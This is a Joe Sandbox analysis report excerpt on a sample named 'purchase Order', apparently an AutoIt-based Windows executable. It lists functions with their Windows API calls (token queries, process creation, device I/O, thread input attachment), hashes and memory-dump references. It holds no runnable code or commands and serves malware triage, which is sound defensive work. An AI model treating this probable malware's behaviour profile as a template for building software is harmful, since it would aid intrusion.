Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 8cbbf937c00ad1a007e92455d6a079e07a9cddd9b1bb1fe382b0fb482364319a
Instruction ID: c2ba4d84fbb81e5d28f6a3a9eed48635d2b8fe7ccda8e6ff83a89adfd39348dd
Opcode Fuzzy Hash: 8cbbf937c00ad1a007e92455d6a079e07a9cddd9b1bb1fe382b0fb482364319a
Instruction Fuzzy Hash: 37217571900619EFEB60AF91DC88BDBB7B8EF40708F10846DE91692050E770EA59DF58

Function 00C86713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C86733
_memset.LIBCMT ref: 00C86754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C867A6
CloseHandle.KERNEL32(00000000), ref: 00C867AF

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 25c2a4f8e78d932e0dd7d56601c4769f5d0bc189f437881a324e40a4f4be92ff
Instruction ID: da7bc60664b314584568047f54d99dce2da02cb42b2a1abc2c388178ae9df056
Opcode Fuzzy Hash: 25c2a4f8e78d932e0dd7d56601c4769f5d0bc189f437881a324e40a4f4be92ff
Instruction Fuzzy Hash: A411CA759012287AE73067A5AC4DFAFBABCEF44764F1041AAF505E71D0D2745F808BA8

Function 00C7B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C7AA79
Part of subcall function 00C7AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C7AA83
Part of subcall function 00C7AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C7AA92
Part of subcall function 00C7AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C7AA99
Part of subcall function 00C7AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C7AAAF

GetLengthSid.ADVAPI32(?,00000000,00C7ADE4,?,?), ref: 00C7B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C7B227
HeapAlloc.KERNEL32(00000000), ref: 00C7B22E
CopySid.ADVAPI32(?,00000000,?), ref: 00C7B247

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 317ab929953003329fc04193f41a4f662db3192405d2b7f9e43bf569ef2cad83
Instruction ID: 2cd352e8fc7c08be35c94a6c0cc2d2ec2414c1d1b8ff31071a9853930c3d7318
Opcode Fuzzy Hash: 317ab929953003329fc04193f41a4f662db3192405d2b7f9e43bf569ef2cad83
Instruction Fuzzy Hash: 4E11B871A01205AFCB049F98CD84FAEB7A9EF84318B14C06DE94A97212D731AE45DB20

Function 00C7B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C7B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C7B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C7B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C7B4DB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e48f354195cf45cc6caec448a43df810654af6b7813b33a357d3903093c7c5dd
Instruction ID: 3b4c15c4660c69730b977d98de1f05a9dc299570a7880596a82d327701b93fee
Opcode Fuzzy Hash: e48f354195cf45cc6caec448a43df810654af6b7813b33a357d3903093c7c5dd
Instruction Fuzzy Hash: F5112A7A900218FFDB11DFA9C985F9DBBB8FB08710F208091E605B7295D771AE11DB94

Function 00C5B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00C5B5A5
GetClientRect.USER32(?,?), ref: 00CBE69A
GetCursorPos.USER32(?), ref: 00CBE6A4
ScreenToClient.USER32(?,?), ref: 00CBE6AF

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 9ed77de485168ce39cd26151d47249ff2c8e170b3423c29c649db449317dfce6
Instruction ID: f790593fc0e9e37ebfc81e15f5c63861a18ab7fa34fb33aa382a438b4a51d3b8
Opcode Fuzzy Hash: 9ed77de485168ce39cd26151d47249ff2c8e170b3423c29c649db449317dfce6
Instruction Fuzzy Hash: 3F11487990012ABFCB14DF94CC85EEE7BB8EB09306F500455F912E7140E730AE85DBA5

Function 00C8732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C87352
MessageBoxW.USER32(?,?,?,?), ref: 00C87385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C8739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C873A2

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: a540e0e9b4e655be3fcd0accb9b94d6b548e87c06f867d57a5bbe604387d95b1
Instruction ID: d89d36fd026ec6b5c1813f3764d1df61001a76c77111fd48a740359a9839b414
Opcode Fuzzy Hash: a540e0e9b4e655be3fcd0accb9b94d6b548e87c06f867d57a5bbe604387d95b1
Instruction Fuzzy Hash: C711E172A08204BFC701ABA9DC45F9E7BAD9B45324F144325F829D32A1E770CE0097B9

Function 00C74DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00C74E16

Part of subcall function 00C754F5: __fltout2.LIBCMT ref: 00C7551E

__cftog_l.LIBCMT ref: 00C74E3C
__cftoe_l.LIBCMT ref: 00C74E6E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: b3b1abdb8362f2deb2d9bbc91709dcce8b8916d3a78747cd4e6b105d87b6e3c1
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 0D01493240014EBBCF1A5E98DC018EE7F23BB183A0B588455FE2C59031D336CAB2BB81

Function 00C67452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C67A0D: __getptd_noexit.LIBCMT ref: 00C67A0E

__lock.LIBCMT ref: 00C6748F
InterlockedDecrement.KERNEL32(?), ref: 00C674AC
_free.LIBCMT ref: 00C674BF
InterlockedIncrement.KERNEL32(015D4CC0), ref: 00C674D7

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 7bbd9669136336b52f0496f23019ac78f91b1411fffbe684e687661df20083a1
Instruction ID: 387b774cad7373a7abfeada929e75cecb43f70dd84b08c171298ec7659473709
Opcode Fuzzy Hash: 7bbd9669136336b52f0496f23019ac78f91b1411fffbe684e687661df20083a1
Instruction Fuzzy Hash: E001F972905611ABC731AF64958D77DBB70BF04718F184605F82863690CF349A41DFC7

Function 00C67A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00C67AD8

Part of subcall function 00C67CF4: __mtinitlocknum.LIBCMT ref: 00C67D06
Part of subcall function 00C67CF4: EnterCriticalSection.KERNEL32(00000000,?,00C67ADD,0000000D), ref: 00C67D1F

InterlockedIncrement.KERNEL32(?), ref: 00C67AE5
__lock.LIBCMT ref: 00C67AF9
___addlocaleref.LIBCMT ref: 00C67B17

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: 0d807e12fccdb784da9f38b73ba6fb91ffe2b41d1cac8de0216c4f9212757a9e
Instruction ID: 66853734766bb1d19f28c96525ef90d892abed1c798d2b7618bf62056109a06b
Opcode Fuzzy Hash: 0d807e12fccdb784da9f38b73ba6fb91ffe2b41d1cac8de0216c4f9212757a9e
Instruction Fuzzy Hash: 83016DB1404B00EFD730DF75C94574AB7F0AF44329F208D0EE59A976A0CB74A680DB45

Function 00CAE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CAE33D
_memset.LIBCMT ref: 00CAE34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D03D00,00D03D44), ref: 00CAE37B
CloseHandle.KERNEL32 ref: 00CAE38D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: be499561845e346a2d78f53b3f2dfacf44726380f92211c5ceabffaf3b40e762
Instruction ID: 2437060a86ef1d119e77dcd575d1366b35bf8b0df7549e5464a7f399f393af4b
Opcode Fuzzy Hash: be499561845e346a2d78f53b3f2dfacf44726380f92211c5ceabffaf3b40e762
Instruction Fuzzy Hash: 10F058F1640314BBE2106B61AC46FBB7E6CDB04B98F004421FE0DEA2A2D3759E0096B8

Function 00CAEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00C5AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C5AFE3
Part of subcall function 00C5AF83: SelectObject.GDI32(?,00000000), ref: 00C5AFF2
Part of subcall function 00C5AF83: BeginPath.GDI32(?), ref: 00C5B009
Part of subcall function 00C5AF83: SelectObject.GDI32(?,00000000), ref: 00C5B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CAEA8E
LineTo.GDI32(00000000,?,?), ref: 00CAEA9B
EndPath.GDI32(00000000), ref: 00CAEAAB
StrokePath.GDI32(00000000), ref: 00CAEAB9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: ea5a1bbe2c307787f5a5f546ad52945d6bc3038f956fd39e813c81599ab422d0
Instruction ID: a5b0d9ac0a6e59fc8749001dd76628382f1b1eed03a70ac426ff2d188a415efe
Opcode Fuzzy Hash: ea5a1bbe2c307787f5a5f546ad52945d6bc3038f956fd39e813c81599ab422d0
Instruction Fuzzy Hash: A2F0823200525ABBDB12AF98ED0DFCE3F59AF06311F084201FE12611E1C7755A51DBE9

Function 00C7C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C7C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7C85D
GetCurrentThreadId.KERNEL32 ref: 00C7C864
AttachThreadInput.USER32(00000000), ref: 00C7C86B

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 9407db954fd468f34bfc557d104ac9ea9ef7414f0c58f0beb7968577237b18a0
Instruction ID: 0655c888a63605b2232e5e247ce8aa9d115f4f898cf42c34c6d04080bef44fbc
Opcode Fuzzy Hash: 9407db954fd468f34bfc557d104ac9ea9ef7414f0c58f0beb7968577237b18a0
Instruction Fuzzy Hash: 48E06D71141228BADB205BA2EC4DFDF7F1CEF067A1F008429F60E844A0C6B1C580CBE0

Function 00C7B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00C7B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,00C7AC9D), ref: 00C7B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C7AC9D), ref: 00C7B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,00C7AC9D), ref: 00C7B0F1

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 2a319e3a5a6d7bbf8ac146791dc288966c1bade9b9e6091ad011960d1c1bbd72
Instruction ID: 195a7761cab14d521d1727958e696f47ca5782a9340884e782d07ca5de1fa34a
Opcode Fuzzy Hash: 2a319e3a5a6d7bbf8ac146791dc288966c1bade9b9e6091ad011960d1c1bbd72
Instruction Fuzzy Hash: E4E04F726012119BD7201FB5DD0CF4F3BA8AF55792F018828E246D6050DA2484028761

Function 00C5B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00C5B496
SetTextColor.GDI32(?,000000FF), ref: 00C5B4A0
SetBkMode.GDI32(?,00000001), ref: 00C5B4B5
GetStockObject.GDI32(00000005), ref: 00C5B4BD
GetWindowDC.USER32(?,00000000), ref: 00CBDE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 00CBDE38
GetPixel.GDI32(00000000,?,00000000), ref: 00CBDE51
GetPixel.GDI32(00000000,00000000,?), ref: 00CBDE6A
GetPixel.GDI32(00000000,?,?), ref: 00CBDE8A
ReleaseDC.USER32(?,00000000), ref: 00CBDE95

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: e4fc340405ff20fc5d5b58bb5e6fc5d023ce54d164534d4364a54a2a1ec39299
Instruction ID: 8927926de4d6fe68e04b86d42ea5379329d646fd87d9166d0ffa05c3b333e36d
Opcode Fuzzy Hash: e4fc340405ff20fc5d5b58bb5e6fc5d023ce54d164534d4364a54a2a1ec39299
Instruction Fuzzy Hash: 9DE0C931100240AADB215B64EC09BDD7B11AB52336F14C666FABB980E197718A859B11

Function 00C7B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C7B2DF
UnloadUserProfile.USERENV(?,?), ref: 00C7B2EB
CloseHandle.KERNEL32(?), ref: 00C7B2F4
CloseHandle.KERNEL32(?), ref: 00C7B2FC

Part of subcall function 00C7AB24: GetProcessHeap.KERNEL32(00000000,?,00C7A848), ref: 00C7AB2B
Part of subcall function 00C7AB24: HeapFree.KERNEL32(00000000), ref: 00C7AB32

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 68c0612410fe453546146f29424da6b51bf8c71db0df216b2413346aabc30be6
Instruction ID: 4e83eb0f9a69ad1bcf3438acc53bec47bd4f3f8592e546983a716764df71348d
Opcode Fuzzy Hash: 68c0612410fe453546146f29424da6b51bf8c71db0df216b2413346aabc30be6
Instruction Fuzzy Hash: 28E0267A104405BBDB016BA5EC08E5DFBB6FF993213148631F626815B5CB32A872EB91

Function 00CBB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00CBB29A
GetDC.USER32(00000000), ref: 00CBB2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CBB2C3
ReleaseDC.USER32 ref: 00CBB2E2

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ac09a1c1b11595773ad8bb5d55fd53951e66f444eff61e1cf48734297547d8a6
Instruction ID: 22a2699195d55136e179a097a3058a74b90485816e1c63ea4c103bdb5b98601f
Opcode Fuzzy Hash: ac09a1c1b11595773ad8bb5d55fd53951e66f444eff61e1cf48734297547d8a6
Instruction Fuzzy Hash: DFE046B5100204EFEB005F70C848B6E7BA8EB4C355F11C82AFC9BCB211CBB4A881DB44

Function 00CBB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00CBB2AE
GetDC.USER32(00000000), ref: 00CBB2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CBB2C3
ReleaseDC.USER32 ref: 00CBB2E2

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c6ad18d63858d15daeec9acff106cf7d0d202845262b159b51e6c20e189735d1
Instruction ID: e52f6e4c63f882170f6f0116f342db49eb2d451e80138c3b550de8a3242b0ae5
Opcode Fuzzy Hash: c6ad18d63858d15daeec9acff106cf7d0d202845262b159b51e6c20e189735d1
Instruction Fuzzy Hash: 00E046B5500200EFDB005F70C848B6D7BA8EB4C355F118829FD9BCB211CB78A881DB04

Function 00C7DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00C7DEAA

Strings

Container, xrefs: 00C7DE29
AutoIt3GUI, xrefs: 00C7DE22

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

